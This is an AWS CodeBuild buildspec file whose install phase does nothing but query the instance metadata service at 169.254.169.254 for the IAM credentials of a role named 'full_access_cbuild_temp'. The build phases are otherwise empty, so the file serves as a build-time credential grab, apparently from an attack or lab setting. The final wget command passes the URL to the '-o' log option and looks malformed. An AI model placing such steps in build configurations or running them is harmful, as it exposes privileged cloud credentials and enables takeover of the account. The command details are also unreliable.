version: 0.1
phases:
  install:
    commands:
        - wget --spider http://169.254.169.254/latest/meta-data/
        - wget --spider http://169.254.169.254/latest/meta-data/iam/
        - wget --spider http://169.254.169.254/latest/meta-data/iam/security-credentials/full_access_cbuild_temp
        - wget -o http://169.254.169.254/latest/meta-data/iam/security-credentials/full_access_cbuild_temp
  build:
    commands:
  post_build:
    commands:
artifacts:
  files:
